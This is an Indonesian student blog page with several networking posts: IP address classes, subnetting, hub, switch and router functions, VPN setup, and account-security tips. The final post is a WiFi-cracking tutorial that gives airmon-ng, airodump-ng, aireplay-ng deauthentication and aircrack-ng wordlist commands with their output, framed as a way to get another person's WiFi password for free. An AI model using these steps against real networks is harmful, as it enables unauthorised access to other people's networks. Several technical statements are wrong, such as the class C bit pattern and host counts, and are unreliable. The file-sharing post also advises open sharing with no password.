This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions..

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions..

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions..

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions..

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions..

Wednesday 28 May 2014

Pembagian Kelas IP Address Pada Jaringan Komputer

Tips dan Trik Komputerku | Kali ini saya akan memposting artikel tentang  Kelas IP Addres Komputer Jaringan mengapa tentang Kelas IP Addres Komputer Jaringan karena di sekolah saya yaitu di SMK NEGRI 1 CILEGON saya mengambil jurusan TKJ,maka saya di ajarkan tentang Kelas IP Addres Komputer Jaringan , maka dari itu saya membuat posting ini.

Kelas IP Address Pada Jaringan Komputer

A. PENDAHULUAN
IP adalah (Internet Protocol) protokol di internet / jaringan komputer yang mengurusi masalah pengalamatan dan mengatur pengiriman  paket data sehingga ia sampai ke alamat yang benar. Setiap komputer jaringan atau terkoneksi internet harus memiliki alamat yang unik. Satu alamat hanya boleh dimiliki satu komputer.

IP Adders adalah identitas satu komputer dalam jaring computer / internet, seperti halnya rumah kita memupnyai nomer rumah yang tertempel pada dinding. Penulisan IP Adders terbagi  4 kelompok 8 bit yang dituliskan dalam bilangan biner. Dimana setiap kelompok dalam IP  Adders dipisahkan oleh titik  (red;Dot). Nilai terbesar dari bilangan biner 8 bit adalah 255. Oleh karena itu jumlah IP Adders yang tersedia ialah 255.255.255.255 IP Adders yang sebanyak ini harus dibagi bagikan keseluruh pengguna jaringan komputer / internet di seluruh dunia.

B. PEMABAGIAN KELAS KELAS IP ADDERS

pembagian Kelas IP Address Pada Jaringan Komputer


Dengan adanya permasalahan tersebut maka IP Adders dibagi sesuai dengan kelas kelas IP Adders. Dasar pertimbangan Pembagian IP Adders ke dalam kelas kelas adalah untuk mempermudah penditribusian pendaftaran IP Adders kepengguna jaringan komputer / internet. IP Adders ini dibagi dalam 5 kelas yaitu : kelas A, kelas B Kelas  C, kelas D dan kelas E.

Perbedaan dari masing masing kelas adalah pada ukuran dan jumlahnya. Kelas  A dipakai oleh sedikit jaringan namun jaringan ini memiliki anggota yang besar. Kelas B dipakai untuk jaringan sedang dan besar kelas ini mempunyai banyak jaringan dan juga memiliki anggota yang besar hingga ribuan. Kelas C dipakai oleh banyak jaringan namun, anggota masing masing jaringan sedikit. Kelas D dan E juga didefinisikan, tetapi tidak digunakan dalam pengenggunaan normal, kelas D dipergunakan dalam jaringan multicasting dan kelas E untuk keperluan Eksperimental.

Pemabagian kelas kelas IP Adders didasarkan dua hal network ID dan host ID  dari suatu IP Addres.  Setiap IP Addres meruapakan pasangan sebuah network ID dan sebuah host ID. Network ID ialah bagian IP Addres yang digunakan untuk menujukan temapat komputer ini berada, sedangkan host ID ialah bagian dari IP Addres yang digunakan untuk menunjukan workstation, server, router dan semua TCP?IP lainnya dalam jaringan tersebut dalam jaringan host ID harus unik.

    Kelas A

Karakteristik  :

Format                       : 0nnnnnnn hhhhhhhh hhhhhhhh hhhhhhh

Bit pertama                : 0

Panjang NetID           : 8 bit

Panjang HostID         : 24 bit

Byte pertama             : 0 – 127

Jumlah                        : 126 kelas A (0 dan 127 dicadangkan)

Range IP                     : 1.xxx.xxx.xxx sampai 126.xxx.xxx.xxx

Jumlah IP                    : 16.777.214 IP Adders pada tiap kelas  A

IP Addar kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Bit pertama dari kelas A selalu diset 0 sehingga byte terdepan kelas A selalu bernilai antara 0 dan 127. IP Adders kelas A, network ID ialah 8 bit pertama, sedangkan host ID  24 bit berikutnya. Dengan demikian pembacaan IP Adders kelas A : misalnya  012.26.2.6 ialah :

Network ID                : 012

Host ID                       : 26.2.6

Dengan panjang host ID yang 24 , maka network ini dapat menampung sekitar 16 juta host setiap jaringan .

    Kelas B

Karakteristik :

Format                       : 10nnnnnn nnnnnnnn hhhhhhhh hhhhhhhh

Dua bit pertama        : 10

Panjang NetID           : 16 bit

Panjang HostID         : 16 bit

Byte pertama             : 128 – 191

Jumlah                        : 16.384 kelas B

Range IP                     : 128.0.xxx.xxx sampai 191.155.xxx.xxx

Jumlah IP                    : 65.532 IP Adders pada tiap kelas B

IP Adders kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Dua bit pertama dari IP addres kelas B selalu diset 10 sehingga byte terdepan dari IP adders ini selalu bernialai diantara 128 hingga 191. Pada IP Adders kelas B, network ID ialah 16 bit pertama sedangkan 16 bit berikutnya ialah host ID. Dengan demikian pembacaan IP addres kelas B misalkan: 128.29 121.1 ialah:

Network ID                : 128.29

Host ID                       : 121.1

Dengan panjang host ID yang 16 bit, IP Adders Kelas B ini menjangkau sampai 16.320 jaringan dengan masing-masing 65024 host.

    Kelas C

Karakteristik :

Format                       : 110nnnnn nnnnnnnn nnnnnnnn hhhhhhhh

Tiga bit pertama        : 110

Panjang NetID           : 24 bit

Panjang HostID         : 8 bit

Byte pertama             : 192 – 223

Jumlah                        :  2.097.152 kelas C

Range IP                     : 192.0.0.xxx sampai 223.255.255.xxx

Jumlah IP                    : 65.532 IP Adders pada tiap kelas C

IP Adders kelas C awalnya digunkan untuk jaringan berskala  kecil mislanya LAN. Terdiri atas network 192.0.0.0 sampai 223.255.255.0. Network ID ada pada tiga bit yang pertama selalu berisi 111. Bersama 21 bit berikutnya membentuk network ID 24 bit. Host ID ialah 8 bit terakhir. Kelas ini menjangkau hingga hampir 2 juta jaringan dengan masing-masing 254 host.

    Kelas D

Karakteristik :

Format                       : 1110mmmmm mmmmmmmm mmmmmmmm mmmmmmm

4 Bit pertama             : 1110

Bit multicasting          : 28 bit

Byte inisial                 : 224 – 247

Diskripsi                     : Kelas  D adalah ruang alamat multicasting RFC (1112)

IP Addres kelas D dipergunakan untuk  IP Adders  multicasting. 4 bit pertama IP Addres kelas D diset 1110 . Bit bit seterusnya diatur sesuai multicasting grup yang menggunakan IP Adders ini. Dalam multicasting tidak dikenal host ID dan network ID.

    Kelas E

Karakteristik :

Format                       : 1111rrrrr rrrrrrrr rrrrrrrr rrrrrrr

4 Bit pertama             : 1111

Bit cadangan              : 28 bit

Byte inisial                 : 248 – 255

Diskripsi                     : Kelas  E adalah ruang alamat yang dicadangkan untuk keperluan   eksperimental

IP Addres kelas E tidak digunakan untuk keperluan umum. 4 bit pertama diset 1111.

IP PRIVATE DAN IP PUBLIC
Berdasarkan jenisnya IP address dibedakan menjadi 2 macam yaitu IP Private dan IP Public.
IP Private adalah suatu IP address yang digunakan oleh suatu organisasi yang diperuntukkan untuk jaringan lokal. Sehingga organisasi lain dari luar organisasi tersebut tidak dapat melakukan komunikasi dengan jaringan lokal tersebut. Contoh pemakaiannya adalah pada jaringan intranet.
Sedangkan Range IP Private adalah sebagai berikut :
Kelas A : 10.0.0.0 – 10.255.255.255
Kelas B : 172.16.0.0 – 172.31.255.255
Kelas C : 192.168.0.0 – 192.168.255.255

IP Public adalah suatu IP address yang digunakan pada jaringan lokal oleh suatu organisasi dan organisasi lain dari luar organisasi tersebut dapat melakukan komunikasi langsung dengan jaringan lokal tersebut. Contoh pemakaiannya adalah pada jaringan internet.
Sedangkan range dari IP Public : range IP address yang tidak termasuk dalam IP Private.

SUBNETTING
Subnetting adalah pembagian suatu kelompok alamat IP menjadi beberapa network ID lain dengan jumlah anggota jaringan yang lebih kecil, yang disebut subnet (subnetwork).
Subnet Mask merupakan angka biner 32 bit yang digunakan untuk :
•Membedakan antara network ID dengan host ID.
•Menunjukkan letak suatu host, apakah host tersebut berada pada jaringan luar atau jaringan lokal.

Tujuan dalam melakukan subnetting ini adalah :
•Membagi satu kelas netwok atas sejumlah subnetwork dengan arti membagi suatu kelas jaringan menjadi bagian-bagian yang lebih kecil.
•Menempatkan suatu host, apakah berada dalam satu jaringan atau tidak.
•Untuk mengatasi masalah perbedaaan hardware dengan topologi fisik jaringan.
•Penggunaan IP Address yang lebih efisien.

Ada dua pendekatan dalam melakukan pembentukan subnet, yaitu :
•Berdasarkan jumlah jaringan yang akan dibentuk.
•Berdasarkan jumlah host yang dibentuk dalam jaringan.

Kedua-duanya akan dipakai untuk menentukan efisiensi pe¬nomoran IP dalam suatu lingkungan jaringan. Pada subnet mask seluruh bit yang berhubungan dengan host ID diset 0. Sedangkan bit yang berhubungan dengan network ID diset 1.
Untuk menentukan suatu host berada pada jaringan luar atau pada jaringan lokal, kita dapat melakukan operasi AND antara subnet mask dengan IP Address asal dan IP Address tujuan, serta membandingkan hasilnya sehingga dapat diketahui ke mana arah tujuan dari paket IP tersebut. Jika kedua hasil operasi tersebut sama, maka host tujuan terletak di jaringan lokal dan paket IP dikirim langsung ke host tujuan. Jika hasilnya berbeda, maka host terletak di luar jaringan lokal, sehingga paket IP dikirim ke default router.

SEKILAS TENTANG IPV6 (IP VERSI 6)

Perkembangan jaringan dan internet yang berkembang sangat pesat akhir-akhir ini membuat Internet Protocol (IP) yang sering digunakan dalam jaringan dengan TCP/IP menjadi ketinggalan. Khususnya, karena sekarang ini telah terdapat berbagai aplikasi pada internet yang membutuhkan kapasitas IP jaringan yang sangat besar dan dengan jumlah yang sangat banyak. Aplikasi-aplikasi tersebut di antaranya email, multimedia menggunakan internet, remote access, FTP (File Transfer Protocol), dan lain sebagainya. Aplikasi ini membutuhkan supply layanan jaringan yang lebih cepat dan fungsi keamanan menjadi faktor terpenting di dalamnya.
Kebutuhan akan fungsi keamanan tersebut tidak dapat dipenuhi oleh IPV4, karena pada IP ini memiliki keterbatasan, yaitu hanya mempunyai panjang address sampai dengan 32 bit saja. Dengan demikian, diciptakanlah suatu IP untuk mengatasi keterbatasan resource Internet Protocol yang telah mulai berkurang serta memiliki fungsi keamanan yang handal (relia¬bility). IP tersebut adalah IPV6 (IP Versi 6), atau disebut juga dengan IPNG (IP Next Generation). IPV6 merupakan pengembangan dari IP terdahulu yaitu IPV4. Pada IP ini terdapat 2 pengalamatan dengan panjang address sebesar 128 bit.
Penggunaan dan pengaturan IPV4 pada jaringan dewasa ini mulai mengalami berbagai masalah dan kendala. Di mulai dari masalah pengalokasian IP address yang akan habis digunakan karena banyaknya host yang terhubung atau terkoneksi dengan internet, mengingat panjang addressnya yang hanya 32 bit serta tidak mampu mendukung kebutuhan akan komunikasi yang aman.


IPv6 mempunyai tingkat keamanan yang lebih tinggi karena berada pada level Network Layer, sehingga dapat mencakup semua level aplikasi. Hal tersebut berbeda dengan IPV4 yang bekerja pada level aplikasi. Oleh sebab itu, IPV6 mendukung penyusunan address secara terstruktur, yang memungkinkan Internet terus berkembang dan menyediakan kemampuan routing baru yang tidak terdapat pada IPV4.

Fungsi Hub dan Switch

FUNGSI HUB DAN SWITCH HUB
Dalam Jaringan komputer kita perlu hub yang berfungsi untuk menggabungkan beberapa komputer menjadi satu buah kelompok jaringan. Mungkin bila kita hanya akan menghubungkan dua buah PC kita hanya akan memerlukan Kabel UTP dengan Crimping dengan metode cross cable. Tapi bagaimana halnya dengan 10 PC ? atau 20 PC ? disinilah fungsi hub bekerja dimana komputer2 tersebut akan dihubungkin dengan UTP Straight Cable yang dicolokkan ke port2 yang ada di hub dan diset dengan IP dengan alamat jaringan yang sama, maka kita akan berada di dalam jaringan komputer yang terdiri lebih dari 2 buah PC.
Sekarang ini banyak orang menilai hub sudah cukup untuk mengatasi problema seperti itu, tetapi dilihat dari sisi lain ternyata hub memiliki sedikit kejelekan dimana dia akan membroadcast semua paket yang akan dikirim ke salah satu IP Tujuan. Hal ini mungkin tidak akan terasa bila kita hanya memiliki 10 buah PC yang terkoneksi dalam satu jaringan. Tetapi bagaimana dengan ratusan ? atau bahkan mungkin ribuan? disinilah fungsi switch sebenarnya bekerja.Di bidang jaringan komputer seringkali kita mendengar kata hub dan switch, bentuknya mirip dan fungsinya dasarnya juga sama yaitu untuk transfer data dari dan ke komputer-komputer dalam suatu jaringan. Beberapa waktu yang lalu penulis mendapati pertanyaan sederhana mengenai perbedaan antara hub dan switch dari beberapa rekan penulis. Melalui artikel kali ini penulis akan bahas secara singkat mengenai perbedaannya. Dari tampak luar, sebuah hub atau switch terlihat sama, keduanya memiliki jack RJ-45 untuk berhubungan dengan suatu device. Sebelum berbicara mengenai mengenai perbedaan antara keduanya maka ada baiknya kita lihat sejenak mengenai keterbatasan suatu (non switched) ethernet, yaitu hanya satu device yang dapat mentransmit data ke suatu segment pada suatu waktu tertentu. Jika lebih dari satu device berusaha mentransmit data pada waktu yang bersamaan maka akan terjadilah collision. Setelah collision terjadi maka setiap device tadi harus melakukan proses pengiriman data kembali (re-transmit). Dapat dibayangkan jika jumlah segment dalam jaringan semakin bertambah maka otomatis kemungkinan akan terjadinya collision akan semakin besar, dan karena akibat collision ini semua device akan melakukan proses re-transmit maka otomatis traffic jaringan akan menjadi relatif lebih lambat. Sebelum ditemukannya teknologi switch, suatu jaringan dapat dibagi-bagi ke dalam beberapa segment dengan suatu device yang dinamakan bridge. Bridge memiliki dua buah port ethernet. Jika ada traffic ke dalam jaringan maka secara otomatis bridge akan mengamati device-device yang terlibat di dalamnya dari kedua sisi (melihat berdasarkan MAC address-nya). Bridge kemudian akan mampu membuat keputusan untuk mem-forward atau tidak mem-forward setiap paket data menuju ke device tujuan.
Hub
Sama seperti switch, tetapi perbedaannya adalah hub tidak memiliki faslitas routing. Sehingga semua informasi yang datang akan dikirimkan ke semua komputer (broadcast)
.
Hub adalah istilah umum yang digunakan untuk menerangkan sebuahcentral connection point untuk komputer pada network. Fungsi dasaryang dilakukan oleh hub adalah menerima sinyal dari satu komputer danmentransmisikannya ke komputer yang lain.Sebuah hub bisa active atau passive. Active hub bertindak sebagairepeater; ia meregenerasi dan mengirimkan sinyal yangdiperkuat. Passive hub hanya bertindak sebagai kotak sambungan; iamembagi/memisahkan sinyal yang masuk untuk ditransmisikan ke seluruhnetwork.Hub adalah central utnuk topologi star dan mengijinkan komputer untukditambahkan atau dipindahkan pada network dengan relatif mudah.Kapabilitas yang disediakan hub central utnuk topologi star dan mengijinkan computer untuk ditambahkan atau dipindahkan pada network dengan relatif mudah.
Fungsi tambahan selain sebagai central connection point, hubmenyediakan kemampuan berikut:
– memfasilitasikan penambahan, penghilangan atau pemindahan
– workstation. menambah jarak network (fungsi sebagai repeater)
– menyediakan fleksibilitas dengan mensupport interface yang berbeda
– (Ethernet, Token Ring, FDDI). menawarkan feature yang fault
– tolerance (isolasi kerusakan) memberikan manajemen service yang
– tersentralisasi (koleksi informasi, diagnostic
Kekurangannya, hub cukup mahal, membutuhkan kabel tersendiri untukberjalan, dan akan mematikan seluruh network jika ia tidak berfungsi.Cara kerja Hubpada dasarnya adalah sebuah pemisah sinyal (signal splitter). Iamengambil bit-bit yang datang dari satu port dan mengirimkan copynyake tiap-tiap port yang lain. Setiap host yang tersambung ke hub akanmelihat paket ini tapi hanya host yang ditujukan saja yang akanmemprosesnya. Ini dapat menyebabkan masalah network traffic karenapaket yang ditujukan ke satu host sebenarnya dikirimkan ke semua host(meskipun ia hanya diproses oleh salah satu yang ditujukannya saja).
Switch
Biasanya switch banyak digunakan untuk jaringan LAN token star.Dan switch ini digunakan sebagai repeater/penguat. Berfungsi untuk menghubungkan kabel-kabel UTP ( Kategori 5/5e ) komputer yang satu dengan komputer yang lain. Dalam switch biasanya terdapat routing, routing sendiri berfungsi untuk batu loncat untuk melakukan koneksi dengan komputer lain dalam LAN.
Switch adalah hub pintar yang mempunyai kemampuan untuk menentukantujuan MAC address dari packet. Daripada melewatkan packet ke semuaport, switch meneruskannya ke port dimana ia dialamatkan. Jadi, switchdapat secara drastis mengurangi traffic network.Switch memelihara daftar MAC address yang dihubungkan ke port-portnyayang ia gunakan untuk menentukan kemana harus mengirimkanpaketnya. Karena ia beroperasi pada MAC address bukan pada IP address,switch secara umum lebih cepat daripada sebuah router.
Kenapa Switch Lebih Baik?
Di dalam hub tidak ada proses apa-apa dalam menangani traffic jaringan. Hub hanya mengulang sinyal yang masuk ke seluruh port yang ada pada hub tersebut. Ini akan sangat berbeda dengan switch, di dalam switch setiap port berfungsi juga sebagai suatu bridge. Jika suatu port terhubung dengan suatu device maka secara prinsipal setiap device akan bersifat independen terhadap device lainnya. Perbedaan lainnya lagi adalah bahwa 10/100 ethernet hub hanya bekerja secara half-duplex, ini artinya adalah sebuah device hanya dapat mengirim atau menerima data pada suatu waktu tertentu. Switch mampu bekerja secara full-duplex yang artinya mampu menerima dan mengirimkan data pada saat yang bersamaan.Sebagai contoh misalnya ada suatu switch yang pada port-nya terpasang beberapa device berikut ini:
– Computer 1
– Computer 2
– Computer 3
- Printer
– File Server
– Uplink ke internet.
Perbedaan lainnya lagi adalah bahwa 10/100 ethernet hub hanya bekerja secara half-duplex, ini artinya adalah sebuah device hanya dapat mengirim atau menerima data pada suatu waktu tertentu. Switch mampu bekerja secara full-duplex yang artinya mampu menerima dan mengirimkan data pada saat yang bersamaan.Pada kasus ini, Computer 1 dapat melakukan proses print (cetak) dokumen, sementara itu Computer 2 bisa mengakses file server, dan sementara itu pula Computer 3 dapat melakukan akses ke Internet. Ini semua bisa dilakukan karena switch dapat secara pintar melakukan forward traffic paket data khusus hanya kepada device-device yang terlibat saja. Ini juga yang disebut dengan hubungan antar device yang simultan dan bersifat independen. Jadi kesimpulannya di dalam switch terdapat suatu mekanisme filtering dan forwarding terhadap traffic jaringan yang melewatinya.
Switch Bekerja pada lapisan data link ( Baca posting mengenai OSI Layer ) tetapi memiliki keunggulan di mana masing-masing port memiliki domain collision sendiri ( Port memiliki jalur data sendiri-sendiri ) Switch juga menganut sistem mac address learning dimana dia akan memiliki tabel pernerjemah pusat yang memiliki daftar penerjemah untuk semua port. Switch juga dapat membuat VPN antara port pengirim dan penerima. Switch ini menggunakan transmisi full duplex dimana memiliki jalur antara receive dan transmit data secara terpisah.
Dalam mengolah data switch dapat digolongkan dalam tiga jenis :
1. Store and Forward – switch akan meneruskan frame setelah data di terima secara lengkap
2. Cut-Through Switch Meneruskan Frame tanpa menunggu penerimaan frame secara lengkap
3. Fragment Free ( Hybrid ) merupakan kompromi dari kedua jenis switch diatasSwitch Juga diperkuat oleh teknologi VLAN ( Virtual LAN ) dimana dia mampu Mensegmentasi jaringan LAN secara logika tanpa harus menuruti lokasi fisik peralatan.Switch juga dapat berfungsi sebagai Spanning Tree protokol yang bersifat redundant jika dia menilai suatu jalur itu sibuk maka dia ( switch ) akan memilih jalur lain yang tidak sibuk.

Fungsi Router :
1.Router berfungsi utama sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya. Perbedaannya dengan Switch adalah kalau switch merupakan penghubung beberapa alat untuk membentuk suatu Local Area Network (LAN).
2.ROUTER menstranmisikan informasi dari satu jaringan ke jaringan lain yang sistem kerjanya mirip dengan BRIDGE.
3.Digunakan juga untuk menghubungkan LAN ke sebuah layanan telekomunikasi seperti halnya telekomunikasi leased line atau Digital Subscriber Line (DSL). Router digunakan untuk menghubungkan LAN ke sebuah koneksi leased line seperti T1, atau T3, sering disebut sebagai access server.
4.Digunakan untuk menghubungkan jaringan lokal ke sebuah koneksi DSL disebut juga dengan DSL router. Router-router jenis tersebut umumnya memiliki fungsi firewall untuk melakukan penapisan paket berdasarkan alamat sumber dan alamat tujuan paket tersebut, meski beberapa router tidak memilikinya. Router yang memiliki fitur penapisan paket disebut juga dengan packet-filtering router. Fungsi router umumnya memblokir lalu lintas data yang dipancarkan secara broadcast sehingga dapat mencegah adanya broadcast storm yang mampu memperlambat kinerja jaringan.
5.FIREWALL
6.GATEWAY SERVER
7.DHCP SERVER
8.DNS SERVER
9.VPN TUNING
10.HOST MANAGER USER

Setting Koneksi VPN Pada Windows 8

Tips dan Trik Komputerku | VPN adalah singkatan dari Virtual Private Network, dengan VPN kita dapat terhubung ke LAN (Local Area Network) melalui koneksi internet seolah-olah kita berada pada lokasi dimana LAN tersebut berada, padahal kita berada di tempat yang berbeda, beda daerah atau bahkan beda negara. Misalnya kita terhubung melalui VPN ke LAN kantor kita dari rumah, dalam perjalanan, selagi dinas ke daerah atau dari luar negeri.

Untuk dapat terhubung ke Router atau server VPN maka di komputer/laptop/Tablet komputer (tab) harus disetting VPN Client.

Di Windows 8 untuk setting VPN client langkah-langkahnya sebagai berikut :

• Klik kanan pada icon network yang berada di taskbar sudut kanan bawah
• Kemudian pilih Open Network and Sharing Center


Setting Koneksi VPN Pada Windows 8

Kemudian akan muncul jendela Network and Sharing Center 
• Klik pada  Set up a new connection or network

 
• Pilih  Connect to a workplace, kemudian klik Next
Setting Koneksi VPN Pada Windows 8

• Pada langkah selanjutnya anda dapat memilih untuk menggunakan eksisting connection untuk digunakan ketika akan konek ke VPN, tapi kalau saya lebih memilih No, create a new connection.
klik Next

Setting Koneksi VPN Pada Windows 8

• Pada  jendela Connect to Workplace, pilih Use my Internet connection (VPN)


Setting Koneksi VPN Pada Windows 8

• Masukkan alamat IP server/router VPN
• Beri Nama pada Destination name, kemudian klik Create.

Setting Koneksi VPN Pada Windows 8

Setting VPN telah dibuat, maka sekarang kita tinggal menjalankan/menyambungkan koneksi VPN kalau diperlukan.


• Klik kiri pada icon Network yang berada pada taskbar sudut kanan bawah, maka akan muncul jendela/menu Network

Setting Koneksi VPN Pada Windows 8

• Klik pada koneksi VPN yang telah kita buat tadi, pada contoh namanya My VPN Connection 2

Setting Koneksi VPN Pada Windows 8

Masukkan Username dan Password VPN anda lalu klik OK untuk memulai koneksi.

Setting Koneksi VPN Pada Windows 8

Kalau sudah berhasil maka statusnya akan Connected

Setting Koneksi VPN Pada Windows 8

Setelah statusnya connected, anda sudah dapat konek ke komputer atau server di kantor anda.
Source:tipskomputer.com

Monday 19 May 2014

Cara Mencegah Akun Fb,Yahoo di Hack

Cara Mencegah Hack Akun fb,yahoo.google.dll - "Tips Trik Komputerku " Bagi anda yang pernah mengalami salah satu akun anda, seperti akun  Facebook, Yahoo,Gmail, dll di hack oleh seorang hacker jangan khawatir. Karena pada postingan kali ini saya akan membahas tentang Cara Mencegah Hack Akun. Sebenarnnya banyak cara yang digunakan untuk cara hack akun seseorang, tetapi banyak juga cara untuk mencegahnnya.

Beberapa cara Mencegah Hack Akun:

1. Gunakan selalu browser yang terupdate, efek dari browser yang selalu diupdate adalah akan ada semakin banyak pembaruan terhadap browser tersebut, sehingga dapat meningkatkan security pada browser tersebut. Disini saya merekomendasikan 2 browser terbaik menurut saya yaitu Mozilla Firefox dan Google Chrome. Untuk memudahkan kedua update browser tersebut, sangat disarankan update melalui situs resminnya, yaitu Homepage Mozilla Firefox, dan Homepage Google Chrome.

2. Selalu Menggunakan private browsing pada browser jika komputer anda diakses oleh orang banyak, fungsi dari private browsing ini adalah untuk menghilangkan history pada browser dan cookies ketika anda keluar dari browser. Selain itu jika anda lupa Log Out dari suatu Web maka secara otomatis jika browser anda akan di close maka otomatis juga anda akan log out.

Cara menggunakan private browsing pada Mozilla Firefox:
  • Buka browser, lalu pada pojok kiri pilih firefox
  • Selanjutnnya akan ada pilihan Start Private Browsing, pilih pilihan tersebut.
Cara Mencegah Akun Fb,Yahoo di Hack
  • Jika sudah maka tampilan browser Mozilla akan seperti gambar dibawah,  sekarang anda bebas menggunakan browser tanpa perlu takut akun anda di hack
Cara Mencegah Akun Fb,Yahoo di Hack

3.  Menggunakan Fitur Virtual Keyboard untuk mencegah keylogger. Meski cara ini cukup lama karena anda memasukkan password dengan menggunakan Virtual Keyboard bukan dari keyboard, tetapi cara ini sangat ampuh untuk terhindar dari keylogger atau software hacker sejenis.untuk menggunakan fitur ini klik disini

4. Jangan mencentang selalu log in atau pilihan sejenis seperti Keep me Logged in (pada log in facebook), karena pilihan ini sangat rawan jika komputer anda dipakai oleh pihak lain yang tidak bertanggung jawab. Jadi jika anda mencentang pilihan selalu log in,apabila komputer anda di akses orang lain dan orang tersebut membuka facebook di browser sobat,maka akun fb sobat masih tetap login.dan itu sangat mudah di hack oleh orang tersebut.

Cara Mencegah Akun Fb,Yahoo di Hack

Sekian Cara Mencegah Hack Akun

Cara Menggunakan Fitur Virtual Keyboard

Menggunakan Fitur Virtual Keyboard Fitur ini memang jarang di gunakan tapi kadangkala kita sangat memerlukanya heheh.apabila ada tombol keyboard sobat yang ga bisa di gunakan,yah jalan satu"nya gunakan fitur ini dulu :D. Anda tidak perlu repot mencari software Virtual Keyboard.karena pada Windows 7 dan Windows XP telah menyediakan fitur ini.

Cara menggunakan Virtual Keyboard pada Windows 7:

Cara Menggunakan Fitur Virtual Keyboard Pada windows7,xp

  • Klik start, pilih all programs
  • Selanjutnnya pilih accessories, lalu pilih Ease of Acces
  • Yang terakhir adalah pilih On-screen Keyboard.

Sunday 18 May 2014

Sharing Data Windows 7 dan Windows XP

Tips dan Trik Komputerku | Sharing Data Windows 7 dan Windows XP Untuk saling sharing Windows 7 dengan XP perlu beberapa cara dalam menyetting agar kedua OS ini bisa saling terhubung, dalam settingan ini banyak peningkatan pengamanan pada fitur sharing di Windows 7 ini.

Sharing Data Windows 7 dan Windows XP



Cara Sharing Windows 7 dengan Windows XP:

Pada Windows 7:
  1. Klik start - Buka control panel - Pilih Network and Sharing Center.
  2. Klik Change Advanced Sharing Setting, ubah semua setting untuk dapat mengijinkan komputer lain terhubung, untuk memudahkan dalam koneksi sebaiknnya jangan diisikan password.
  3. Klik Save Changes.
  4. Sekarang buat folder yang akan dibagi ke komputer lain.
  5. Buka Windows Explorer - Buat folder baru - Klik kanan folder tersebut - Pilih Properties.
  6. Klik tab Sharing - Klik tombol share.
  7. Pada menu dropdown tambahkan user yang diinginkan untuk akses folder. Misalkan menggunakan Everyone untuk memungkinkan semua orang bisa mengakses tanpa password.
  8. Klik Share.
Pada Windows XP:
  1. Buka Windows Explorer - Buat folder baru yang digunakan untuk sharing file.
  2. Klik kanan folder tersebut - Pilih properties.
  3. Klik Tab Sharing - Beri tanda cek pada Share this folder on the network.
  4. Klik OK 
Baca juga : cara sharing data secara offline alias hanya menggunakan kabel cross

Tutorial Hacking Cara Mendapatkan Password Wifi

Tips dan trik komputerku | Video Tutorial How To Wirelles Hacking video tutorial untuk hacking wireless, cracking wireless, hacking wifi, hacking password wi-fi, hacking wpa, Video Tutorial How To Wirelles Hcking, cara hack wirelles, cracking WPA/PSK key

Video Tutorial How To Wirelles Hacking - Video Tutorial ini merupakan media pembelajaran semata, jadi bagi anda yang ingin belajar Cara Hacking Wirelles - Cracking WPA/PSK Key diharapkan memakai ilmu ini secara bijak.

Tutorial Hacking Mendapatkan Password Wifi

Tujuan dari Hack Wirelles - Cracking WPA/PSK Key ini adalah untuk mendapatkan password wifi secara gratis, apabila wifi tempat anda diberikan password.

Jika anda ingin mencobanya coba siapkan dahulu:
  • Backtrack 5 untuk secondary Operation System anda. Jadi buatlah dual boot.
  • Mengumpulkan password wordlist, agar bisa melihat passwordnya.
  • Koneksi Wirelles atau wirelles card.
  • WPA yang ada di laptop anda.
  • Jhon The Ripper Password Cracker.
  • Aircrack-ng dan airodump-ng (aircrack package)


How To Wirelles Hacking?
Answer
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Zydas zd1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)

2. Selanjutnya jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3. JIika sudah mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 --channel 11 --bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu. Pasti ada yang login logout kan? Nah sampai ketemu hal seperti berikut dibawah:

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

5. Setelah logout user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
